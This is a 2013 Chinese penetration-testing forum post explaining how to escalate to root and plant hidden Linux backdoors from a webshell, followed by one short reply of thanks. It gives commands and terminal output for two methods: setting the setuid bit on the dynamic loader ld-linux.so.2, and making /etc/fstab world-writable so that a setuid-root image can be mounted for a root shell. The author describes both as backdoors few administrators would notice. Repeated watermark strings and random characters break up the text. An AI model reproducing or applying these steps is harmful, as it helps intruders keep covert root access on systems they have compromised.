中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]
作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
) P0 _& _' g: M, x+ K0 w. E- U! o0 L1 |* d) \
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
2 X7 D& P8 ]5 S+ b6 h- flrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究  g, s& H7 l+ M2 W% o3 _
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
' t) w7 S5 x3 U# t0 A- h[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究& T" N) F  {: h  C! `  M
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究- L/ B3 M7 A- \% ]9 y
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
4 j6 B- h0 o( r& p! z) Q0 t2 zlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
; K7 c" [* Q* h% m, K[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
& Q% Q3 D3 O5 h+ v我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究
; _6 p% @' U! U0 T1 Q
' v4 {% ]# Q; s; Z# j' e7 C- h$ U普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究" m" F  |2 e4 `7 z

) Z' H/ y2 \  ~+ Y8 Y" e[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
% {" K. c1 H/ \- Sxiaoyu2ezX-BUG-关注前沿信息安全技术研究0 w9 m+ f  r. o' ?' u
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究* h! T6 O- t  T- v/ g6 [$ k6 H6 d
root2ezX-BUG-关注前沿信息安全技术研究8 ]1 q& h6 `& u8 n, x# K9 r4 Z
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究, Y4 z. T2 t+ z6 e1 M
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究; [& C3 [: G+ O4 h+ f" u- s

) ?: u5 P. ]: l方法二:2ezX-BUG-关注前沿信息安全技术研究7 g  M* i2 A3 m% e- n5 d

3 m' M) h2 F/ Y" A% ]  b看过程:2ezX-BUG-关注前沿信息安全技术研究4 D! h' |0 Q  p, i- h6 C, O
, D+ t9 v6 F1 r
[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
8 m1 Y: V8 |& A5 h; e[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究! D& ^& C" M1 ^) Q; d

8 v/ X/ u8 }. T; L& x3 h这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
, m/ g( k7 F1 ^5 ~& {" O" \2 U7 @. T8 X( n+ q
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究* w7 j0 ?$ e: Q0 D# b: _) p' O4 n
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
, P! ]: |5 ?, I3 {" l9 A[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
% D/ Y; p/ y, h0 \% M0 F4 _2 m& u3 e- O8 C$ O5 V8 f) v
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
" F3 T# |/ v8 |% {. k% C) S5 g1 @3 u5 o2 }- ]- p, d
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究8 j; g+ x: E" i7 C8 h
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
6 U& }8 d6 ?5 m9 D9 z  J1 }$ z[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
2 v. u; C1 ]) d/ h6 a[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究# x; }2 R. U/ E5 V3 p5 o5 J
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
* f5 s, o( _% `5 Y% {; }; `total 182ezX-BUG-关注前沿信息安全技术研究
# k6 `6 s  C/ U( H4 h- |2 j. Mdrwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究5 I( ~) i: i+ o/ V$ e
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究
1 Z; k: R) H' q  c6 n[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究
, c; p& [, ]* J' ?+ N" ~. m/ ?4 _sh-3.2#2ezX-BUG-关注前沿信息安全技术研究" \6 a! C" D8 }& e- E
看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
& q' b) k; K3 U' g9 |test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
/ B) B# G8 m2 H+ j( W$ _8 r6 U2 {4 n
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
: p) o% @1 ?) D1 F+ o2 p2ezX-BUG-关注前沿信息安全技术研究( j/ z4 N2 B( ~2 d: U' Q( [

! r; h) l; ~! a5 V
作者: wuyu    时间: 2013-3-13 15:10
谢谢分享



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2